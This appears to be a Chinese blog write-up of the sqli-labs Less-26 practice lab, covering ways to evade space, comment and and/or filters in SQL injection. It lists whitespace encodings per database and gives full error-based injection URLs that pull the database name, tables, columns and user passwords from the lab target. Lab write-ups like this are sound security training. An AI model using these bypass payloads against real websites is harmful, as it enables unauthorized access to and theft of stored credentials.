sqli-labs less-26 空格绕过

空格绕过

过滤空格

用Tab代替空格%20 %09 %0a %0b %0c %0d %a0 //()
绕过空格注释符绕过//--%20/
/#--±- -;%00;

空白字符绕过SQLite3 ------ 0A,0D,0c,09,20

MYSQL

09,0A,0B,0B,0D,A0,20

PosgressSQL

0A,0D,0C,09,20

Oracle_11g

00,0A,0D,0C,09,20

MSSQL

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,OF,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

特殊符号绕过

` + !

等科学计数法绕过

例:

select user,password from users where user_id0e1union select 1,2

unicode编码

%u0020 %uff00

%c0%20 %c0%a0 %e0%80%a0

sqli-labs less-26

l

来到less-26,从下面的提示不难猜测本关卡为绕过,首先输入的单引号,确定闭合方式为'单引号,

继续测试,发现注释符被过滤,构造

http://192.168.140.130/sq/Less-26/?id=1' and '1'='1

发现and/or也被过滤,构造

http://192.168.140.130/sq/Less-26/?id=1' aandnd '1'='1

此时,我们发现我们的的空格也被过滤了。

本来打算进行空格绕过的,但在不通的环境下,url编码绕过可能出现的情况不一样,且因为我没有在linux环境下搭建sqli-labs靶场,在我的靶场搭建在windows下的小皮面板上,使用空格编码绕过发现无效,使用我使用报错注入结合()来绕过空格。

绕过

数据库名

http://192.168.140.130/sq/Less-26/?id=1'` || 1=extractvalue(1,concat('\~',(select (database()))))||` '1'='1

表名

http://192.168.140.130/sq/Less-26/?id=1' || 1=extractvalue(1,concat('~',(select (group_concat(table_name))from(infoorrmation_schema.tables)where((table_schema=database())) )))|| '1'='1

列名

http://192.168.140.130/sq/Less-26/?id=1' || 1=extractvalue(1,concat('~',(select (group_concat(column_name))from(infoorrmation_schema.columns)where((table_schema=database()%26%26(table_name='users'))) )))|| '1'='1

数据

http://192.168.140.130/sq/Less-26/?id=1' || 1=extractvalue(1,substring((select(group_concat(username,'~',passwoorrd))from(security.users)),30,30))|| '1'='1

用控制()的方法实现了对空格的绕过,当然还有其他很多方法,不同的环境绕过方式也不一样,勇于尝试。

相关推荐
DEARM LINER10 分钟前
mysql 巧妙的索引
数据库·spring boot·后端·mysql
码农幻想梦1 小时前
实验九 视图的使用
前端·数据库·oracle
影子落人间1 小时前
Oracle创建存储过程,创建定时任务
数据库·oracle
大G哥1 小时前
02、Oracle过滤和排序数据
数据库·oracle
安科瑞刘鸿鹏2 小时前
校园建筑用电安全监测装置 电气火灾监测预防设备功能介绍
运维·服务器·网络·嵌入式硬件·安全·能源
开心工作室_kaic3 小时前
ssm010基于ssm的新能源汽车在线租赁管理系统(论文+源码)_kaic
java·前端·spring boot·后端·汽车
代码吐槽菌3 小时前
基于SSM的汽车客运站管理系统【附源码】
java·开发语言·数据库·spring boot·后端·汽车
伏虎山真人3 小时前
开源数据库 - mysql - 组织结构(与oracle的区别)
数据库·mysql·开源
茶颜悦色vv4 小时前
网络搜索引擎Shodan(2)
网络·安全·web安全·搜索引擎·网络安全
大力水手~4 小时前
css之loading旋转加载
前端·javascript·css